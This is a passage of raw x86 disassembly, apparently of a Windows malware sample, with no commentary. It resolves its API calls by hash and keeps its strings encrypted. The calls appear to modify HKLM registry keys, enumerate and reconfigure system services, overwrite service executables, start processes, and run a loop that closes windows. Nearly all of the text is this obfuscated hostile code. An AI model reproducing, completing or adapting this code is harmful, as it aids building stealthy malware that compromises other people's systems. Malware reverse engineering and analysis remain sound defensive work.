dd 0B4033936h, 0E7463427h
; ---------------------------------------------------------------------------
loc_401BCC: ; CODE XREF: sub_401B6C+53�j
jmp short loc_401BD2
; ---------------------------------------------------------------------------
dword_401BCE dd 0E5FBDE67h ; ---------------------------------------------------------------------------
loc_401BD2: ; CODE XREF: sub_401B6C:loc_401BCC�j
push offset dword_41EA95
push offset word_405842
push 80000002h
push ds:dword_401BCE
push offset byte_401BC1
call sub_40173B
call eax ; dword_401B40
push offset dword_401A7C
call sub_4016B4
push 0BAh ; dwSize
push (offset loc_401A84+1) ; int
call sub_40162B
jmp short loc_401C12
; ---------------------------------------------------------------------------
dword_401C0E dd 0A79C0D67h ; sub_401B6C+F7�r ...
; ---------------------------------------------------------------------------
loc_401C12: ; CODE XREF: sub_401B6C+A0�j
push 0B8h
push (offset loc_401A84+1)
push 3
push 0
push offset word_405842
push dword_41EA95
push ds:dword_401C0E
push offset byte_401BC1
call sub_40173B
call eax ; dword_401B40
or eax, eax
jnz locret_401CCA
push 3
pop dword_41EA99
push 4
push offset dword_41EA99
push 4
push 0
push offset byte_41EAA9
push dword_41EA95
push ds:dword_401C0E
push offset byte_401BC1
call sub_40173B
call eax
push dword_41EA95
push ds:dword_40195F
push offset byte_401819
call sub_40173B
call eax
jmp short loc_401C93
; ---------------------------------------------------------------------------
dword_401C8F dd 49E9E1A4h ; sub_402A4C+140�r
; ---------------------------------------------------------------------------
loc_401C93: ; CODE XREF: sub_401B6C+121�j
push dword_41EA9D
push 0
push 1
push ds:dword_401C8F
push offset byte_401819
call sub_40173B
call eax
jmp short loc_401CB5
; ---------------------------------------------------------------------------
dword_401CB1 dd 0A408C75Dh ; sub_402A4C+155�r
; ---------------------------------------------------------------------------
loc_401CB5: ; CODE XREF: sub_401B6C+143�j
push 1
push eax
push ds:dword_401CB1
push offset byte_401819
call sub_40173B
call eax
locret_401CCA: ; CODE XREF: sub_401B6C+10�j
; sub_401B6C+D3�j
retn
sub_401B6C endp
; ---------------------------------------------------------------------------
byte_401CCB db 0 ; DATA XREF: sub_401D07+2F�o
; .text:00401E1C�o
dd 22710012h, 6721E3ACh, 1E497D29h, 3C6E4504h, 461ADD98h
dd 533A1855h, 0D7FFD9Eh, 0CCBFC3ACh, 32540768h
db 53h, 27h
word_401CF2 dw 700h ; DATA XREF: sub_401D07+7B�o
; .text:00401E5B�o
dd 61327B00h, 0D8C6B50Fh, 344829ACh
; ---------------------------------------------------------------------------
pop eax
call dword ptr [ebx+346464h] ; DATA XREF: sub_401D07+BE�o
; .text:00401E67�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D07 proc near ; CODE XREF: sub_40220E+24C�p
; sub_40220E+34C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
jmp short loc_401D13
; ---------------------------------------------------------------------------
dword_401D0F dd 1F513831h ; sub_401E9C+69�r ...
; ---------------------------------------------------------------------------
loc_401D13: ; CODE XREF: sub_401D07+6�j
push 11h
push 40h
push ds:dword_401D0F
push offset byte_401819
call sub_40173B
call eax
mov [ebp+var_8], eax
push 400h
push offset byte_41EABD
push offset byte_401CCB
call sub_401647
jmp short loc_401D46
; ---------------------------------------------------------------------------
dword_401D42 dd 0FF42948Bh ; .text:00401E3B�r ...
; ---------------------------------------------------------------------------
loc_401D46: ; CODE XREF: sub_401D07+39�j
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push offset byte_41EABD
push 80000002h
push ds:dword_401D42
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jnz short loc_401DEA
mov [ebp+var_C], 11h
push 400h
push offset byte_41EABD
push offset word_401CF2
call sub_401647
jmp short loc_401D92
; ---------------------------------------------------------------------------
dword_401D8E dd 0BFC4180Ah ; sub_4026F2+CE�r ...
; ---------------------------------------------------------------------------
loc_401D92: ; CODE XREF: sub_401D07+85�j
lea eax, [ebp+var_C]
push eax
push [ebp+var_8]
push 0
push 0
push offset byte_41EABD
push [ebp+var_4]
push ds:dword_401D8E
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jz short loc_401DC2
mov eax, 0
jmp short loc_401DED
; ---------------------------------------------------------------------------
loc_401DC2: ; CODE XREF: sub_401D07+B2�j
push [ebp+var_8]
push (offset loc_401D01+2)
push ds:dword_4018A1
push offset byte_401819
call sub_40173B
call eax
or eax, eax
jnz short loc_401DE5
push 1
pop eax
jmp short loc_401DE8
; ---------------------------------------------------------------------------
loc_401DE5: ; CODE XREF: sub_401D07+D7�j
push 0
pop eax
loc_401DE8: ; CODE XREF: sub_401D07+DC�j
jmp short loc_401DED
; ---------------------------------------------------------------------------
loc_401DEA: ; CODE XREF: sub_401D07+68�j
push 0
pop eax
loc_401DED: ; CODE XREF: sub_401D07+B9�j
; sub_401D07:loc_401DE8�j
push eax
jmp short loc_401DF4
; ---------------------------------------------------------------------------
dword_401DF0 dd 4AD25820h ; ---------------------------------------------------------------------------
loc_401DF4: ; CODE XREF: sub_401D07+E7�j
push [ebp+var_8]
push ds:dword_401DF0
push offset byte_401819
call sub_40173B
call eax
pop eax
leave
retn
sub_401D07 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push 400h
push offset byte_41EABD
push offset byte_401CCB
call sub_401647
lea eax, [ebp-4]
push eax
push 0F003Fh
push 0
push offset byte_41EABD
push 80000002h
push ds:dword_401D42
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jnz short locret_401E8A
push 400h
push offset byte_41EABD
push offset word_401CF2
call sub_401647
push 11h
push (offset loc_401D01+2)
push 1
push 0
push offset byte_41EABD
push dword ptr [ebp-4]
push ds:dword_401C0E
push offset byte_401BC1
call sub_40173B
call eax
locret_401E8A: ; CODE XREF: .text:00401E4F�j
leave
retn
; ---------------------------------------------------------------------------
dd 5E000600h, 0CEA2FB0Dh, 4CACF89Dh, 90E8A509h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E9C proc near ; CODE XREF: sub_40220E+2FB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
jmp short loc_401EA8
; ---------------------------------------------------------------------------
dword_401EA4 dd 718E6C3Bh ; sub_401FDC+23�r ...
; ---------------------------------------------------------------------------
loc_401EA8: ; CODE XREF: sub_401E9C+6�j
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
push ds:dword_401EA4
push offset byte_401819
call sub_40173B
call eax
cmp eax, 0FFFFFFFFh
jz loc_401F71
mov [ebp+var_4], eax
jmp short loc_401EE1
; ---------------------------------------------------------------------------
dword_401EDD dd 0C3B11EB1h ; sub_401FDC+46�r
; ---------------------------------------------------------------------------
loc_401EE1: ; CODE XREF: sub_401E9C+3F�j
push 0
push [ebp+var_4]
push ds:dword_401EDD
push offset byte_401819
call sub_40173B
call eax
mov dword_41EF0C, eax
push dword_41EF0C
push 40h
push ds:dword_401D0F
push offset byte_401819
call sub_40173B
call eax
or eax, eax
jz short loc_401F6A
mov dword_41EF08, eax
jmp short loc_401F26
; ---------------------------------------------------------------------------
dword_401F22 dd 5B70D13Ch ; sub_401FDC+85�r ...
; ---------------------------------------------------------------------------
loc_401F26: ; CODE XREF: sub_401E9C+84�j
push 0
push offset dword_405000
push dword_41EF0C
push dword_41EF08
push [ebp+var_4]
push ds:dword_401F22
push offset byte_401819
call sub_40173B
call eax
push [ebp+var_4]
push ds:dword_40195F
push offset byte_401819
call sub_40173B
call eax
mov eax, 1
jmp short locret_401F76
; ---------------------------------------------------------------------------
loc_401F6A: ; CODE XREF: sub_401E9C+7D�j
mov eax, 0
jmp short locret_401F76
; ---------------------------------------------------------------------------
loc_401F71: ; CODE XREF: sub_401E9C+36�j
mov eax, 0
locret_401F76: ; CODE XREF: sub_401E9C+CC�j
; sub_401E9C+D3�j
leave
retn 4
sub_401E9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F7A proc near ; CODE XREF: sub_401FDC+6�p
; sub_40220E+121�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push 105h
push 40h
push ds:dword_401D0F
push offset byte_401819
call sub_40173B
call eax
mov [ebp+var_4], eax
jmp short loc_401FA2
; ---------------------------------------------------------------------------
dword_401F9E dd 2C70B0Ch ; ---------------------------------------------------------------------------
loc_401FA2: ; CODE XREF: sub_401F7A+22�j
push 0
push ds:dword_401F9E
push offset byte_401819
call sub_40173B
call eax
jmp short loc_401FBC
; ---------------------------------------------------------------------------
dword_401FB8 dd 0C097DCDh ; ---------------------------------------------------------------------------
loc_401FBC: ; CODE XREF: sub_401F7A+3C�j
push 104h
push [ebp+var_4]
push eax
push ds:dword_401FB8
push offset byte_401819
call sub_40173B
call eax
mov eax, [ebp+var_4]
leave
retn
sub_401F7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401FDC proc near ; CODE XREF: sub_40220E+30B�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
call sub_401F7A
mov [ebp+var_8], eax
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+var_8]
push ds:dword_401EA4
push offset byte_401819
call sub_40173B
call eax
cmp eax, 0FFFFFFFFh
jz loc_4020FC
mov [ebp+var_4], eax
push 0
push [ebp+var_4]
push ds:dword_401EDD
push offset byte_401819
call sub_40173B
call eax
mov [ebp+var_C], eax
push [ebp+var_C]
push 40h
push ds:dword_401D0F
push offset byte_401819
call sub_40173B
call eax
mov [ebp+var_10], eax
push 0
push offset dword_405000
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push ds:dword_401F22
push offset byte_401819
call sub_40173B
call eax
push [ebp+var_4]
push ds:dword_40195F
push offset byte_401819
call sub_40173B
call eax
push 0
push 80h
push 5
push 0
push 3
push 0C0000000h
push [ebp+arg_0]
push ds:dword_401EA4
push offset byte_401819
call sub_40173B
call eax
or eax, eax
jz short loc_4020F5
mov [ebp+var_4], eax
jmp short loc_4020BC
; ---------------------------------------------------------------------------
dword_4020B8 dd 5004DC90h ; sub_402105+4B�r
; ---------------------------------------------------------------------------
loc_4020BC: ; CODE XREF: sub_401FDC+DA�j
push 0
push offset dword_405000
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push ds:dword_4020B8
push offset byte_401819
call sub_40173B
call eax
push [ebp+var_4]
push ds:dword_40195F
push offset byte_401819
call sub_40173B
call eax
jmp short locret_402101
; ---------------------------------------------------------------------------
loc_4020F5: ; CODE XREF: sub_401FDC+D5�j
mov eax, 0
jmp short locret_402101
; ---------------------------------------------------------------------------
loc_4020FC: ; CODE XREF: sub_401FDC+38�j
mov eax, 0
locret_402101: ; CODE XREF: sub_401FDC+117�j
; sub_401FDC+11E�j
leave
retn 4
sub_401FDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402105 proc near ; CODE XREF: sub_40220E+361�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push 0
push 80h
push 5
push 0
push 3
push 40000000h
push [ebp+arg_0]
push ds:dword_401EA4
push offset byte_401819
call sub_40173B
call eax
cmp eax, 0FFFFFFFFh
jz short loc_40217E
mov [ebp+var_4], eax
push 0
push offset dword_405000
push dword_41EF0C
push dword_41EF08
push [ebp+var_4]
push ds:dword_4020B8
push offset byte_401819
call sub_40173B
call eax
push [ebp+var_4]
push ds:dword_40195F
push offset byte_401819
call sub_40173B
call eax
mov eax, 1
jmp short locret_402181
; ---------------------------------------------------------------------------
loc_40217E: ; CODE XREF: sub_402105+30�j
push 0
pop eax
locret_402181: ; CODE XREF: sub_402105+77�j
leave
retn 4
sub_402105 endp
; =============== S U B R O U T I N E =======================================
sub_402185 proc near ; CODE XREF: sub_40220E+11C�p
; sub_40220E+29E�p
jmp short loc_40218B
; ---------------------------------------------------------------------------
dword_402187 dd 0D4D4A052h ; sub_402185+60�r
; ---------------------------------------------------------------------------
loc_40218B: ; CODE XREF: sub_402185�j
push offset dword_405000
push 4
push offset dword_41EEDC
push dword_41EED8
push ds:dword_402187
push offset byte_401BC1
call sub_40173B
call eax
push dword_405000
push 40h
push ds:dword_401D0F
push offset byte_401819
call sub_40173B
call eax
mov dword_41EEDC, eax
push offset dword_405000
push dword_405000
push dword_41EEDC
push dword_41EED8
push ds:dword_402187
push offset byte_401BC1
call sub_40173B
call eax
push dword_41EEDC
pop edi
mov eax, [edi+0Ch]
mov dword_41EEE4, eax
mov eax, [edi]
mov dword_41EF04, eax
retn
sub_402185 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40220E proc near ; CODE XREF: start:loc_40382F�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
jmp short loc_40221A
; ---------------------------------------------------------------------------
dword_402216 dd 698C5AB5h ; sub_402BF9+9�r
; ---------------------------------------------------------------------------
loc_40221A: ; CODE XREF: sub_40220E+6�j
push 4
push 0
push 0
push ds:dword_402216
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jz locret_4025B4
mov dword_41EEC0, eax
jmp short loc_402245
; ---------------------------------------------------------------------------
dword_402241 dd 0E2949E0Eh ; sub_40220E+A9�r
; ---------------------------------------------------------------------------
loc_402245: ; CODE XREF: sub_40220E+31�j
push 0
push offset dword_41EECC
push offset dword_41EEC8
push 4
push offset dword_41EEC4
push 3
push 30h
push dword_41EEC0
push ds:dword_402241
push offset byte_401BC1
call sub_40173B
call eax
push dword_41EEC8
push 40h
push ds:dword_401D0F
push offset byte_401819
call sub_40173B
call eax
push eax
pop dword_41EEC4
push 0
push offset dword_41EECC
push offset dword_41EEC8
push dword_41EEC8
push dword_41EEC4
push 3
push 30h
push dword_41EEC0
push ds:dword_402241
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jz loc_402596
push dword_41EEC4
pop edi
push dword_41EECC
pop ecx
loc_4022DF: ; CODE XREF: sub_40220E+382�j
push edi
push ecx
mov eax, [edi]
push eax
pop dword_41EED0
mov eax, [edi+4]
push eax
pop dword_41EED4
jmp short loc_4022FA
; ---------------------------------------------------------------------------
dword_4022F6 dd 0DB16F923h ; sub_40220E+27F�r ...
; ---------------------------------------------------------------------------
loc_4022FA: ; CODE XREF: sub_40220E+E6�j
push 0F01FFh
push dword_41EED0
push dword_41EEC0
push ds:dword_4022F6
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jz loc_40247F
mov dword_41EED8, eax
call sub_402185
call sub_401F7A
mov [ebp+var_4], eax
jmp short loc_40233D
; ---------------------------------------------------------------------------
dword_402339 dd 0B0EAD59h ; sub_40220E+223�r
; ---------------------------------------------------------------------------
loc_40233D: ; CODE XREF: sub_40220E+129�j
push dword_41EED0
push 0
push 0
push 0
push 0
push 0
push [ebp+var_4]
push 0FFFFFFFFh
push 0FFFFFFFFh
push 110h
push dword_41EED8
push ds:dword_402339
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jz loc_40247F
jmp short loc_40237F
; ---------------------------------------------------------------------------
dword_40237B dd 0C6440C9Bh ; sub_402BF9+6B�r
; ---------------------------------------------------------------------------
loc_40237F: ; CODE XREF: sub_40220E+16B�j
push offset dword_41EEE8
push 1
push dword_41EED8
push ds:dword_40237B
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jz short loc_4023E3
loc_4023A2: ; CODE XREF: sub_40220E+1D3�j
push 0Ah
push ds:dword_401B46
push offset byte_401819
call sub_40173B
call eax
jmp short loc_4023BC
; ---------------------------------------------------------------------------
dword_4023B8 dd 0D103437Bh ; ---------------------------------------------------------------------------
loc_4023BC: ; CODE XREF: sub_40220E+1A8�j
push offset dword_41EEE8
push dword_41EED8
push ds:dword_4023B8
push offset byte_401BC1
call sub_40173B
call eax
mov eax, dword_41EEEC
cmp eax, 1
jnz short loc_4023A2
loc_4023E3: ; CODE XREF: sub_40220E+192�j
jmp short loc_4023E9
; ---------------------------------------------------------------------------
dword_4023E5 dd 0BFC675E1h ; sub_40220E+31F�r
; ---------------------------------------------------------------------------
loc_4023E9: ; CODE XREF: sub_40220E:loc_4023E3�j
push 0
push 0
push dword_41EED8
push ds:dword_4023E5
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jz short loc_40240B
jmp short loc_40247F
; ---------------------------------------------------------------------------
loc_40240B: ; CODE XREF: sub_40220E+1F9�j
push dword_41EED0
push 0
push 0
push 0
push 0
push 0
push dword_41EEE4
push 0FFFFFFFFh
push 0FFFFFFFFh
push dword_41EF04
push dword_41EED8
push ds:dword_402339
push offset byte_401BC1
call sub_40173B
call eax
push 9C4h
push ds:dword_401B46
push offset byte_401819
call sub_40173B
call eax
call sub_401D07
or eax, eax
jnz short loc_402465
jmp short loc_40247F
; ---------------------------------------------------------------------------
loc_402465: ; CODE XREF: sub_40220E+253�j
jmp short loc_40246B
; ---------------------------------------------------------------------------
dword_402467 dd 10A0059Fh ; sub_40220E+368�r ...
; ---------------------------------------------------------------------------
loc_40246B: ; CODE XREF: sub_40220E:loc_402465�j
push 0
push ds:dword_402467
push offset byte_401819
call sub_40173B
call eax
loc_40247F: ; CODE XREF: sub_40220E+111�j
; sub_40220E+165�j ...
push 15h
push dword_41EED0
push dword_41EEC0
push ds:dword_4022F6
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jz loc_402588
mov dword_41EED8, eax
call sub_402185
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push dword_41EEE4
push ds:dword_401EA4
push offset byte_401819
call sub_40173B
call eax
cmp eax, 0FFFFFFFFh
jz loc_402588
push eax
pop dword_41EEE0
push dword_41EEE0
push ds:dword_40195F
push offset byte_401819
call sub_40173B
call eax
push dword_41EEE4
call sub_401E9C
cmp eax, 1
jnz short loc_402588
push dword_41EEE4
call sub_401FDC
cmp eax, 1
jnz short loc_402588
push 0
push 0
push dword_41EED8
push ds:dword_4023E5
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jnz short loc_402567
push 0FAh
push ds:dword_401B46
push offset byte_401819
call sub_40173B
call eax
call sub_401D07
or eax, eax
jnz short loc_402569
jmp short loc_402588
; ---------------------------------------------------------------------------
jmp short loc_402569
; ---------------------------------------------------------------------------
loc_402567: ; CODE XREF: sub_40220E+333�j
jmp short loc_402588
; ---------------------------------------------------------------------------
loc_402569: ; CODE XREF: sub_40220E+353�j
; sub_40220E+357�j
push dword_41EEE4
call sub_402105
push 0
push ds:dword_402467
push offset byte_401819
call sub_40173B
call eax
loc_402588: ; CODE XREF: sub_40220E+293�j
; sub_40220E+2D0�j ...
pop ecx
pop edi
add edi, 24h
dec ecx
or ecx, ecx
jnz loc_4022DF
loc_402596: ; CODE XREF: sub_40220E+BD�j
jmp short loc_40259C
; ---------------------------------------------------------------------------
dword_402598 dd 0F2CBBE3h ; sub_402BF9+A1�r
; ---------------------------------------------------------------------------
loc_40259C: ; CODE XREF: sub_40220E:loc_402596�j
push dword_41EEC0
push ds:dword_402598
push offset byte_401BC1
call sub_40173B
call eax
locret_4025B4: ; CODE XREF: sub_40220E+26�j
leave
retn
sub_40220E endp
; ---------------------------------------------------------------------------
dword_4025B6 dd 5F3ACBEDh ; sub_402A4C+10F�r
word_4025BA dw 0B00h ; DATA XREF: sub_402A4C+54�o
; sub_402A4C:loc_402B6D�o ...
dd 5F523F00h, 11573E2Ch, 0B0B3CB74h, 46A2C1D5h, 3F751068h
db 47h, 9Bh, 0FEh
db 0 ; DATA XREF: sub_402A4C+7A�o
dd 0EFCF0007h, 3849351Ah, 0A88897F9h, 31491936h, 45000F00h
dd 0EFDB8D04h, 2DD5FBBFh, 11573B6Ch, 9C295B74h, 0A8692DE8h
dd 0BFC4A5C1h, 503FD3h, 180067h, 56001756h, 88A6DD8Dh
dd 7F0D7929h, 1651B74h, 0B1D26F1Ah, 154AFB8Fh, 16792866h
dd 0F69FCEBAh, 1970EE88h, 93F27211h, 0B62483Ch, 600E9EF1h
dword_402638 dd 7E003300h, 0F4743B2Dh, 8AABFFB2h, 0F96627DDh, 0DD5712ABh
; DATA XREF: sub_4026F2+3�o
; sub_40289B+E�o
dd 19DE9381h, 32B1D270h, 0B2452A40h, 85640BC1h, 5EACD8E3h
dd 139EC902h, 0FBA7C97Ah, 5636599Fh, 0A5196A21h, 0C0645F9h
dd 0B6146679h, 313E5BC4h, 0CCDDA95Fh, 0FFC2A79Ah, 0C213608Dh
dd 0F41C73ABh, 0B5A9F59Ah, 0CB234DE0h, 0FF7816A2h, 8074008Ch
dd 3EC2AEE1h
aR: ; DATA XREF: sub_4026F2+A8�o
unicode 0, <R>
dw 0Dh
dw 0CD98h
dw 250h
dd 184DA6EAh, 0D1B51262h, 3D495534h, 246D8CE9h, 0EA8C543Ah
db 0F9h, 96h
word_4026BE dw 600h ; DATA XREF: sub_4026F2+E8�o
dd 0E8007300h, 9ED1B498h, 687704ECh
db 3
db 0, 0Fh, 0 ; DATA XREF: sub_4026F2+115�o
dd 4B25C99Ch, 4628F29Bh, 6C181261h, 0BFD395F4h, 1645315Dh
dd 27557F0Bh, 0D6B8472Eh
; ---------------------------------------------------------------------------
sbb al, 7Bh
loc_4026EE: ; DATA XREF: sub_4026F2:loc_402721�o
pop esp
add [ebx+0], bh ; DATA XREF: sub_4026F2+156�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4026F2 proc near ; CODE XREF: sub_40289B+97�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push offset dword_402638
call sub_4016B4
push offset word_405842
push offset byte_41F415
push ds:dword_401B95
push offset byte_401819
call sub_40173B
call eax
jmp short loc_402721
; ---------------------------------------------------------------------------
dword_40271D dd 0F3FF40D6h ; sub_4026F2+53�r ...
; ---------------------------------------------------------------------------
loc_402721: ; CODE XREF: sub_4026F2+29�j
push offset loc_4026EE
push offset byte_41F415
push ds:dword_40271D
push offset byte_401819
call sub_40173B
call eax
push [ebp+arg_0]
push offset byte_41F415
push ds:dword_40271D
push offset byte_401819
call sub_40173B
call eax
push offset dword_41FD45
push 20019h
push 0
push offset byte_41F415
push 80000002h
push ds:dword_401D42
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jnz loc_40287F
push 400h
pop dword_41FF49
push 1
pop dword_41FF4D
push (offset aR+1)
call sub_4016B4
push offset dword_41FF49
push offset byte_41F415
push offset dword_41FF4D
push 0
push offset word_405842
push dword_41FD45
push ds:dword_401D8E
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jnz loc_40287F
push offset word_4026BE
call sub_4016B4
push offset byte_41F415
push offset word_405842
call sub_401814
cmp eax, 0
jbe loc_40287F
push 200h
pop dword_41FF49
push offset byte_4026CD
call sub_4016B4
push offset dword_41FF49
push offset byte_41F415
push offset dword_41FF4D
push 0
push offset word_405842
push dword_41FD45
push ds:dword_401D8E
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jnz short loc_40287F
push offset byte_41F415
push (offset loc_4026EF+1)
call sub_401814
cmp eax, 0
jbe short loc_40287F
add eax, offset byte_41F415
dec eax
push 64h
push eax
push offset byte_41FC15
push ds:dword_40187B
push offset byte_401819
call sub_40173B
call eax
push 1
pop dword_41FF51
loc_40287F: ; CODE XREF: sub_4026F2+8F�j
; sub_4026F2+E2�j ...
push dword_41FD45
push ds:dword_40195F
push offset byte_401819
call sub_40173B
call eax
leave
retn 4
sub_4026F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40289B proc near ; CODE XREF: sub_402A4C+42�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push 0
pop dword_41FF51
push offset dword_402638
call sub_4016B4
push offset dword_41FD41
push 20019h
push 0
push offset word_405842
push 80000002h
push ds:dword_401D42
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jnz short loc_40293D
push 0
pop [ebp+var_4]
loc_4028E4: ; CODE XREF: sub_40289B+A0�j
push 200h
pop dword_41FF49
jmp short loc_4028F5
; ---------------------------------------------------------------------------
dword_4028F1 dd 0A85917Dh ; ---------------------------------------------------------------------------
loc_4028F5: ; CODE XREF: sub_40289B+54�j
push 0
push 0
push 0
push 0
push offset dword_41FF49
push offset byte_41FD49
push [ebp+var_4]
push dword_41FD41
push ds:dword_4028F1
push offset byte_401BC1
call sub_40173B
call eax
push eax
pop [ebp+var_8]
or eax, eax
jnz short loc_402937
inc [ebp+var_4]
push offset byte_41FD49
call sub_4026F2
loc_402937: ; CODE XREF: sub_40289B+8D�j
cmp [ebp+var_8], 0
jz short loc_4028E4
loc_40293D: ; CODE XREF: sub_40289B+42�j
push dword_41FD41
push ds:dword_40195F
push offset byte_401819
call sub_40173B
call eax
leave
retn
sub_40289B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402957 proc near ; DATA XREF: .text:004029F4�o
; .text:00402A1E�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
jmp short loc_402965
; ---------------------------------------------------------------------------
dword_40295C dd 34064100h, 72227176h ; sub_402957+71�o ...
; ---------------------------------------------------------------------------
aaa
loc_402965: ; CODE XREF: sub_402957+3�j
jmp short loc_40296B
; ---------------------------------------------------------------------------
dword_402967 dd 0A94F24Bh ; ---------------------------------------------------------------------------
loc_40296B: ; CODE XREF: sub_402957:loc_402965�j
push 400h
push offset byte_41F815
push [ebp+arg_0]
push ds:dword_402967
push offset dword_40295C
call sub_40173B
call eax
jmp short loc_402990
; ---------------------------------------------------------------------------
dword_40298C dd 0F90307BEh ; ---------------------------------------------------------------------------
loc_402990: ; CODE XREF: sub_402957+33�j
push offset byte_41FCDD
push offset byte_41F815
push ds:dword_40298C
push offset byte_401819
call sub_40173B
call eax
or eax, eax
jnz short loc_4029D4
jmp short loc_4029B6
; ---------------------------------------------------------------------------
dword_4029B2 dd 0D277AE02h ; ---------------------------------------------------------------------------
loc_4029B6: ; CODE XREF: sub_402957+59�j
push 0
push 0
push 82h
push [ebp+arg_0]
push ds:dword_4029B2
push offset dword_40295C
call sub_40173B
call eax
loc_4029D4: ; CODE XREF: sub_402957+57�j
push 1
pop eax
leave
retn 8
sub_402957 endp
; ---------------------------------------------------------------------------
loc_4029DB: ; CODE XREF: .text:00402A49�j
; DATA XREF: sub_402A4C+F�o
push 64h
push offset byte_41FCDD
push 4025E4h
call sub_401647
jmp short loc_4029F2
; ---------------------------------------------------------------------------
dword_4029EE dd 0D34B44ECh ; .text:00402A23�r
; ---------------------------------------------------------------------------
loc_4029F2: ; CODE XREF: .text:004029EC�j
push 0
push offset sub_402957
push ds:dword_4029EE
push offset dword_40295C
call sub_40173B
call eax
push 64h
push offset byte_41FCDD
push 402605h
call sub_401647
push 0
push offset sub_402957
push ds:dword_4029EE
push offset dword_40295C
call sub_40173B
call eax
push 32h
push ds:dword_401B46
push offset byte_401819
call sub_40173B
call eax
jmp short loc_4029DB
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_402A4C proc near ; CODE XREF: start+15�p
jmp short loc_402A52
; ---------------------------------------------------------------------------
dword_402A4E dd 0EDD013h ; .text:0040340E�r
; ---------------------------------------------------------------------------
loc_402A52: ; CODE XREF: sub_402A4C�j
push offset dword_41FF4D
push 0
push 0
push offset loc_4029DB
push 0
push 0
push ds:dword_402A4E
push offset byte_401819
call sub_40173B
call eax
mov eax, ds:dword_4025B6
xor eax, 0BCh
push eax
call sub_4018EF
or eax, eax
jz locret_402BE5
call sub_40289B
cmp dword_41FF51, 1
jnz locret_402BE5
push offset word_4025BA
call sub_4016B4
push offset word_405842
push offset byte_41F415
push ds:dword_401B95
push offset byte_401819
call sub_40173B
call eax
push offset byte_4025D3
call sub_4016B4
push offset word_405842
push offset byte_41F415
push ds:dword_40271D
push offset byte_401819
call sub_40173B
call eax
push offset byte_41FC15
push offset byte_41F415
push ds:dword_40271D
push offset byte_401819
call sub_40173B
call eax
mov dword_41FF55, 44h
jmp short loc_402B18
; ---------------------------------------------------------------------------
dword_402B14 dd 0C90C36C0h ; sub_40319C+140�r ...
; ---------------------------------------------------------------------------
loc_402B18: ; CODE XREF: sub_402A4C+C6�j
push offset byte_41FF99
push offset dword_41FF55
push 0
push 0
push 0
push 0
push 0
push 0
push offset byte_41F415
push 0
push ds:dword_402B14
push offset byte_401819
call sub_40173B
call eax
loc_402B47: ; CODE XREF: sub_402A4C+11F�j
push 2
push ds:dword_401B46
push offset byte_401819
call sub_40173B
call eax
mov eax, ds:dword_4025B6
xor eax, 7Ah
push eax
call sub_4018EF
or eax, eax
jnz short loc_402B47
loc_402B6D: ; CODE XREF: sub_402A4C+197�j
push offset word_4025BA
call sub_4016B4
push offset word_405842
call sub_40102D
push eax
call sub_4018EF
push eax
push 0
push 1
push ds:dword_401C8F
push offset byte_401819
call sub_40173B
call eax
push 0
push eax
push ds:dword_401CB1
push offset byte_401819
call sub_40173B
call eax
push 2
push ds:dword_401B46
push offset byte_401819
call sub_40173B
call eax
push offset word_4025BA
call sub_4016B4
push offset word_405842
call sub_40102D
push eax
call sub_4018EF
or eax, eax
jnz short loc_402B6D
locret_402BE5: ; CODE XREF: sub_402A4C+3C�j
; sub_402A4C+4E�j
retn
sub_402A4C endp
; ---------------------------------------------------------------------------
word_402BE6 dw 800h ; DATA XREF: sub_402BF9+28�o
dd 34501D00h, 5FFEAD57h, 0DBA2CB37h, 0CB4A26BEh
; ---------------------------------------------------------------------------
scasd
; =============== S U B R O U T I N E =======================================
sub_402BF9 proc near ; CODE XREF: start+5�p
